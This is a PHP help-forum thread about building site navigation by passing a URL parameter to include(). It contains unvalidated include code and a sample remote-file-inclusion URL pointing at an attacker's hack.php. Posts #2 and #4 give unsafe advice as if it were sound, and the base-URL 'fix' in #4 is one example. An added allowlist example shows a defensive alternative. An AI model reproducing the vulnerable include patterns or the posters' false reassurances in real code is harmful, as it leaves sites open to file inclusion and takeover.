
Thread: Some Newbie PHP Questions

  1. #1
    Join Date
    Jan 2005
    Posts
    12

    Default Some Newbie PHP Questions

    1. Right now I'm taking advantage of the include function of PHP so I can increase the robustness of my site navigation (I tend to have a brainstorm half way through every now and then) and I really don't like the usage of Frames.

    I noticed it was getting really tedious making a Switch/Case for every page I had (e.g. index.php?action=contacts needed to have a
    Code:
    case 'contacts': include ('contacts.php')...
    statement) Since I'm naming the file to be included the same as the action (contacts in my previous example), could I declare a single variable to accomplish the same thing?

    Code:
    <? if (isset($_GET['action'])) $PAGE = $_GET['action']; 
    include ($page.'.php');
    ?>
    Because right now I have a ridiculous amount of statements (150 or so) for every page of my site, and I figured there were some tricks I was missing.

    2. Also, does the page I'm including have to have a .php extension? Or could it be HTML or even TXT?

    3. Is it usually better to name the action variable to be more descriptive or more simple? (E.g. index.php?action=affiliates vs. index.php?action=affs)

    4. Can the action variable be renamed to anything I want? I notice some sites using just act.

    Thanks for your time.

  2. #2
    Join Date
    Jan 2005
    Posts
    16

    Default

    1. yes you can do that, the parameter for include can be a string, btw, $PAGE is not equal to $page
    2. nope, can be any extension, usually people use inc
    3. it's totally up to u, ppl use full name as it's easier to debug, ppl use abbreviation because they don't want the end user to know what is passed in the url
    4. yes, it can be anything, just make sure you $_GET['act'] the correct variable

  3. #3
    Join Date
    Feb 2005
    Posts
    8

    Default

    PLEASE READ THIS CAREFULLY!!!!!!
    What you are doing using the include function may seem like a good idea but is a huge security risk!! PHP doesn't care if the value you give it is local or remote. So someone could misuse that to import a page that could reveal details such as your passwords.

    If you did it through the header someone could do something like this

    http://www.yoursite.bithat.com/index...r.com/hack.php

    and PHP would still include it. You need to add some script in that will, say, strip the "http://" substring in $page or someone could hack you easily!

  4. #4
    Join Date
    Feb 2005
    Posts
    12

    Default

    lol I have a solution to that :) Try:

    Code:
    if(isset($HTTP_GET_VARS['page'])) {
    $file_load = $HTTP_GET_VARS['page'];
    $base_url = "[put your host here, eg: http://www.yourhost.com/]";
    include($base_url . $file_load . ".php");
    }
    That way to be able to do the hack thing you were talking about, classicgas, they would have to have access to your server anyway, to be able to put anything in past the $base_url, you see?

    lol I know that's not hard, I just wanted to make sure :)

    hixy
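
An added example, not part of any post in this thread: one way to keep the single-variable include asked about in post #1 without letting the request choose the file, by resolving the action against a fixed allowlist. The page names, the `pages/` directory and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example (not from the thread). Page names and the pages/ directory
// are assumptions chosen for illustration.

// Pattern from post #1, for comparison: the request value reaches include()
// unchecked, so the visitor decides which file (or URL) PHP loads.
//   include($_GET['action'] . '.php');

/**
 * Map a requested action to a file under $pagesDir, or return null.
 * Only names present in $allowed can ever be included.
 */
function resolve_page($action, array $allowed, $pagesDir)
{
    // Reject non-strings (e.g. ?action[]=x) and anything but a plain name.
    if (!is_string($action) || !preg_match('/\A[a-z0-9_]{1,32}\z/', $action)) {
        return null;
    }
    // Strict allowlist lookup: the request selects a key, never a path.
    if (!in_array($action, $allowed, true)) {
        return null;
    }
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $action . '.php');
    $base = realpath($pagesDir);
    // Defence in depth: the resolved file must sit inside the pages directory.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$allowed = array('home', 'contacts', 'affiliates');   // constructed sample list
$action  = isset($_GET['action']) ? $_GET['action'] : 'home';
$file    = resolve_page($action, $allowed, __DIR__ . '/pages');

if ($file === null) {
    header('HTTP/1.1 404 Not Found');
    echo 'Page not found';
} else {
    include $file;
}
```

Keeping `allow_url_include = Off` in php.ini (the default since PHP 5.2) additionally stops `include` from fetching URLs at all.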
